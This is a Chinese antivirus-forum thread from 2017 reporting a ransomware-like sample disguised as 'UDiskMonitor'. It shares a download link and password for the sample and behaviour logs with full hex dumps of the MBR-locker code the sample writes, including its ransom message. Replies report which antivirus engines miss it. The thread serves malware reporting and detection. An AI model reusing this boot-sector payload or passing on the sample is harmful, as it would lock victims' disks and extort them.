查看: 8079|回复: 66
收起左侧

[病毒样本] 今年7月份中的毒,发现360还不报毒。。。

  [复制链接]
KF小西天
发表于 2017-9-7 09:45:44 | 显示全部楼层 |阅读模式
样本已上传网盘。链接:http://pan.baidu.com/s/1c11dCxq 密码:7k89
然而现在绿软上面还有,还能下载。
里面有破解密码,看看能解出来不。

在实机上检测,两台笔记本,同样使用File_Analysis@学雷锋做人 (好用!)检测,一个能检测出,一个检测不出。据说这货还能检测是不是在虚拟机运行。。。。

这是检测出的
[CSS] 纯文本查看 / 双击代码区域 Ctrl+A快速复制
08:54:26[1]:(允许)程序启动:File_Analysis 行为记录成功开启   规则版本:1.7.0.0

08:54:26[2]:(允许)获取文件属性:C:\UDiskMonitor

08:54:28[3]:(阻止)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\SOFTWARE\UDiskMonitor

08:54:28[4]:(允许)时间操作:设置定时器(一)     时间间隔:10ms

08:54:40[6]:(阻止)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\SOFTWARE\UDiskMonitor

08:54:40[7]:(允许)读取文件:\\.\\physicaldrive0     访问权限:-2147483648

08:54:40[8]:(阻止)修改内核对象:\\.\\physicaldrive0(物理磁盘)

08:54:40[9]:(阻止)写入MBR Hex: 33 C0 8E D0 BC 00 7C 8E C0 8E D8 BE 00 7C BF 00 06 B9 00 02 FC F3 A4 50 68 1C 06 CB FB B9 04 00 BD BE 07 80 7E 00 00 7C 0B 0F 85 0E 01 83 C5 10 E2 F1 CD 18 88 56 00 55 C6 46 11 05 C6 46 10 00 B4 41 BB AA 55 CD 13 5D 72 0F 81 FB 55 AA 75 09 F7 C1 01 00 74 03 FE 46 10 66 60 80 7E 10 00 74 26 66 68 00 00 00 00 66 FF 76 08 68 00 00 68 00 7C 68 01 00 68 10 00 B4 42 8A 56 00 8B F4 CD 13 9F 83 C4 10 9E EB 14 B8 01 02 BB 00 7C 8A 56 00 8A 76 01 8A 4E 02 8A 6E 03 CD 13 66 61 73 1C FE 4E 11 75 0C 80 7E 00 80 0F 84 8A 00 B2 80 EB 84 55 32 E4 8A 56 00 CD 13 5D EB 9E 81 3E FE 7D 55 AA 75 6E FF 76 00 E8 8D 00 75 17 FA B0 D1 E6 64 E8 83 00 B0 DF E6 60 E8 7C 00 B0 FF E6 64 E8 75 00 FB B8 00 BB CD 1A 66 23 C0 75 3B 66 81 FB 54 43 50 41 75 32 81 F9 02 01 72 2C 66 68 07 BB 00 00 66 68 00 02 00 00 66 68 08 00 00 00 66 53 66 53 66 55 66 68 00 00 00 00 66 68 00 7C 00 00 66 61 68 00 00 07 CD 1A 5A 32 F6 EA 00 7C 00 00 CD 18 A0 B7 07 EB 08 A0 B6 07 EB 03 A0 B5 07 32 E4 05 00 07 8B F0 AC 3C 00 74 09 BB 07 00 B4 0E CD 10 EB F2 F4 EB FD 2B C9 E4 64 EB 00 24 02 E0 F8 24 02 C3 49 6E 76 61 6C 69 64 20 70 61 72 74 69 74 69 6F 6E 20 74 61 62 6C 65 00 45 72 72 6F 72 20 6C 6F 61 64 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 4D 69 73 73 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 00 00 63 7B 9A 23 E0 D3 95 00 16 D4 74 75 54 53 AA AB AB 54 5C 54 54 54 5C 54 4D 54 AA AB AB 5B AA AB AB 54 44 54 4D 54 0C 24 0F 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 55 AA

08:54:40[10]:(阻止)修改内核对象:\\.\\physicaldrive0(物理磁盘)

08:54:40[11]:(阻止)写入MBR Hex: 8C C8 8E D8 8E D0 8E C0 BC 00 01 BD 00 7D B9 90 00 B8 01 13 BB 0C 00 B2 00 CD 10 B8 00 B8 05 A0 00 8E D8 31 C9 31 DB 31 C0 CD 16 3C 08 74 1B 3C 0D 74 26 B4 02 88 07 88 67 01 30 C0 88 47 02 83 C3 02 41 2E 89 0E FF 7C EB DD 83 EB 02 49 2E 89 0E FF 7C 31 C0 89 07 EB CE 8C C8 8E C0 31 DB 3E 8A 07 3C 57 75 73 83 C3 02 3E 8A 07 3C 57 75 69 83 C3 02 3E 8A 07 3C 65 75 5F 83 C3 02 B1 FF B5 00 2E 88 2E FE 7C 3E 8A 07 3C 00 74 0A 2E 30 06 FE 7C 83 C3 02 E2 EF B8 00 7E 8E C0 31 DB B4 02 B2 80 B0 01 B6 00 B5 00 B1 03 CD 13 BB BD 01 30 ED 26 88 2F BB BE 01 B1 40 26 8A 07 2E 32 06 FE 7C 26 88 07 43 E2 F2 31 DB B4 03 B2 80 B0 01 B6 00 B5 00 B1 01 CD 13 EB 1C BB 00 B8 81 C3 90 00 B0 58 88 07 2E 8B 0E FF 7C 31 C0 89 07 83 C3 02 E2 F9 E9 0B FF B8 FF FF 50 B8 00 00 50 CB 00 00 59 6F 75 72 20 63 6F 6D 70 75 74 65 72 20 69 73 20 6C 6F 63 6B 65 64 2C 20 70 6C 65 61 73 65 20 63 6F 6E 74 61 63 74 20 51 51 3A 32 31 30 31 31 37 38 30 32 30 20 20 66 6F 72 20 74 68 65 20 75 6E 6C 6F 63 6B 20 70 61 73 73 77 6F 72 64 2C 20 70 6C 65 61 73 65 20 64 6F 20 6E 6F 74 20 74 72 79 2C 20 6F 72 20 79 6F 75 72 20 63 6F 6D 70 75 74 65 72 20 66 69 6C 65 73 20 77 69 6C 6C 20 61 6C 77 61 79 73 20 62 65 20 64 65 6C 65 74 65 64 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 16 D4 74 75 54 53 AA AB AB 54 5C 54 54 54 5C 54 4D 54 AA AB AB 5B AA AB AB 54 44 54 4D 54 0C 24 0F 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 55 AA

模糊分析MBR逻辑锁密码范围::2101178020fortheunlockpassword,pleasedonottry,oryourcomputerfileswillalwaysbedeleted     Hex:3A 32 31 30 31 31 37 38 30 32 30 66 6F 72 74 68 65 75 6E 6C 6F 63 6B 70 61 73 73 77 6F 72 64 2C 70 6C 65 61 73 65 64 6F 6E 6F 74 74 72 79 2C 6F 72 79 6F 75 72 63 6F 6D 70 75 74 65 72 66 69 6C 65 73 77 69 6C 6C 61 6C 77 61 79 73 62 65 64 65 6C 65 74 65 64

08:54:40[12]:(允许)读取文件:\\.\\physicaldrive0     访问权限:-2147483648

08:54:40[13]:(阻止)修改内核对象:\\.\\physicaldrive0(物理磁盘)

08:54:40[14]:(阻止)写入MBR Hex: 33 C0 8E D0 BC 00 7C 8E C0 8E D8 BE 00 7C BF 00 06 B9 00 02 FC F3 A4 50 68 1C 06 CB FB B9 04 00 BD BE 07 80 7E 00 00 7C 0B 0F 85 0E 01 83 C5 10 E2 F1 CD 18 88 56 00 55 C6 46 11 05 C6 46 10 00 B4 41 BB AA 55 CD 13 5D 72 0F 81 FB 55 AA 75 09 F7 C1 01 00 74 03 FE 46 10 66 60 80 7E 10 00 74 26 66 68 00 00 00 00 66 FF 76 08 68 00 00 68 00 7C 68 01 00 68 10 00 B4 42 8A 56 00 8B F4 CD 13 9F 83 C4 10 9E EB 14 B8 01 02 BB 00 7C 8A 56 00 8A 76 01 8A 4E 02 8A 6E 03 CD 13 66 61 73 1C FE 4E 11 75 0C 80 7E 00 80 0F 84 8A 00 B2 80 EB 84 55 32 E4 8A 56 00 CD 13 5D EB 9E 81 3E FE 7D 55 AA 75 6E FF 76 00 E8 8D 00 75 17 FA B0 D1 E6 64 E8 83 00 B0 DF E6 60 E8 7C 00 B0 FF E6 64 E8 75 00 FB B8 00 BB CD 1A 66 23 C0 75 3B 66 81 FB 54 43 50 41 75 32 81 F9 02 01 72 2C 66 68 07 BB 00 00 66 68 00 02 00 00 66 68 08 00 00 00 66 53 66 53 66 55 66 68 00 00 00 00 66 68 00 7C 00 00 66 61 68 00 00 07 CD 1A 5A 32 F6 EA 00 7C 00 00 CD 18 A0 B7 07 EB 08 A0 B6 07 EB 03 A0 B5 07 32 E4 05 00 07 8B F0 AC 3C 00 74 09 BB 07 00 B4 0E CD 10 EB F2 F4 EB FD 2B C9 E4 64 EB 00 24 02 E0 F8 24 02 C3 49 6E 76 61 6C 69 64 20 70 61 72 74 69 74 69 6F 6E 20 74 61 62 6C 65 00 45 72 72 6F 72 20 6C 6F 61 64 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 4D 69 73 73 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 00 00 63 7B 9A 23 E0 D3 95 00 16 D4 74 75 54 53 AA AB AB 54 5C 54 54 54 5C 54 4D 54 AA AB AB 5B AA AB AB 54 44 54 4D 54 0C 24 0F 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 55 AA

08:54:40[15]:(阻止)修改内核对象:\\.\\physicaldrive0(物理磁盘)

08:54:40[16]:(阻止)写入MBR Hex: 8C C8 8E D8 8E D0 8E C0 BC 00 01 BD 00 7D B9 90 00 B8 01 13 BB 0C 00 B2 00 CD 10 B8 00 B8 05 A0 00 8E D8 31 C9 31 DB 31 C0 CD 16 3C 08 74 1B 3C 0D 74 26 B4 02 88 07 88 67 01 30 C0 88 47 02 83 C3 02 41 2E 89 0E FF 7C EB DD 83 EB 02 49 2E 89 0E FF 7C 31 C0 89 07 EB CE 8C C8 8E C0 31 DB 3E 8A 07 3C 57 75 73 83 C3 02 3E 8A 07 3C 57 75 69 83 C3 02 3E 8A 07 3C 65 75 5F 83 C3 02 B1 FF B5 00 2E 88 2E FE 7C 3E 8A 07 3C 00 74 0A 2E 30 06 FE 7C 83 C3 02 E2 EF B8 00 7E 8E C0 31 DB B4 02 B2 80 B0 01 B6 00 B5 00 B1 03 CD 13 BB BD 01 30 ED 26 88 2F BB BE 01 B1 40 26 8A 07 2E 32 06 FE 7C 26 88 07 43 E2 F2 31 DB B4 03 B2 80 B0 01 B6 00 B5 00 B1 01 CD 13 EB 1C BB 00 B8 81 C3 90 00 B0 58 88 07 2E 8B 0E FF 7C 31 C0 89 07 83 C3 02 E2 F9 E9 0B FF B8 FF FF 50 B8 00 00 50 CB 00 00 59 6F 75 72 20 63 6F 6D 70 75 74 65 72 20 69 73 20 6C 6F 63 6B 65 64 2C 20 70 6C 65 61 73 65 20 63 6F 6E 74 61 63 74 20 51 51 3A 32 31 30 31 31 37 38 30 32 30 20 20 66 6F 72 20 74 68 65 20 75 6E 6C 6F 63 6B 20 70 61 73 73 77 6F 72 64 2C 20 70 6C 65 61 73 65 20 64 6F 20 6E 6F 74 20 74 72 79 2C 20 6F 72 20 79 6F 75 72 20 63 6F 6D 70 75 74 65 72 20 66 69 6C 65 73 20 77 69 6C 6C 20 61 6C 77 61 79 73 20 62 65 20 64 65 6C 65 74 65 64 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 16 D4 74 75 54 53 AA AB AB 54 5C 54 54 54 5C 54 4D 54 AA AB AB 5B AA AB AB 54 44 54 4D 54 0C 24 0F 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 55 AA

模糊分析MBR逻辑锁密码范围::2101178020fortheunlockpassword,pleasedonottry,oryourcomputerfileswillalwaysbedeleted     Hex:3A 32 31 30 31 31 37 38 30 32 30 66 6F 72 74 68 65 75 6E 6C 6F 63 6B 70 61 73 73 77 6F 72 64 2C 70 6C 65 61 73 65 64 6F 6E 6F 74 74 72 79 2C 6F 72 79 6F 75 72 63 6F 6D 70 75 74 65 72 66 69 6C 65 73 77 69 6C 6C 61 6C 77 61 79 73 62 65 64 65 6C 65 74 65 64

08:54:40[17]:(允许)程序退出:File_Analysis 行为记录到此为止


这是未检测出的
[CSS] 纯文本查看 / 双击代码区域 Ctrl+A快速复制
09:34:49[1]:(允许)程序启动:File_Analysis 行为记录成功开启   规则版本:1.7.0.0

09:34:49[2]:(允许)获取文件属性:C:\UDiskMonitor

09:34:51[3]:(允许)获取文件属性:D:\UB

09:34:51[4]:(允许)时间操作:设置定时器(一)     时间间隔:10ms

09:34:54[6]:(阻止)写注册表值:HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\DestDir     数据:D:\UB

09:34:54[7]:(阻止)写注册表值:HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\AutoHide     数据:

09:34:54[8]:(阻止)写注册表值:HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\AutoRun     数据:

09:34:54[9]:(允许)读取文件:\\.\\physicaldrive0     访问权限:-2147483648

09:34:54[10]:(允许)程序退出:File_Analysis 行为记录到此为止


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 2017-9-7 09:49:33 | 显示全部楼层
管家扫描miss
KF小西天
 楼主| 发表于 2017-9-7 09:53:50 | 显示全部楼层
哈勃未报毒。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
jijihandsome
发表于 2017-9-7 09:55:44 | 显示全部楼层
卡巴未报毒
j2016
发表于 2017-9-7 10:01:30 | 显示全部楼层
猎豹杀,忽略后
过avast扫描和双击
Gollum
发表于 2017-9-7 10:04:06 | 显示全部楼层
本帖最后由 Gollum 于 2017-9-7 10:11 编辑

BDTS、KIS、NS扫描放过
191196846
发表于 2017-9-7 10:14:23 | 显示全部楼层
ESET miss
胖福
发表于 2017-9-7 10:15:05 | 显示全部楼层
双击过诺顿,暂时没有后续动作!
KF小西天
 楼主| 发表于 2017-9-7 10:16:18 | 显示全部楼层
胖福 发表于 2017-9-7 10:15
双击过诺顿,暂时没有后续动作!

点击退出试试,退出会执行mbr病毒模块。
KF小西天
 楼主| 发表于 2017-9-7 10:17:17 | 显示全部楼层
点击退出会将mbr病毒写入硬盘引导区。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|优惠券| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.3( 苏ICP备07004770号 ) GMT+8, 2017-9-20 00:54 , Processed in 0.111194 second(s), 5 queries , MemCache On.

快速回复 返回顶部 返回列表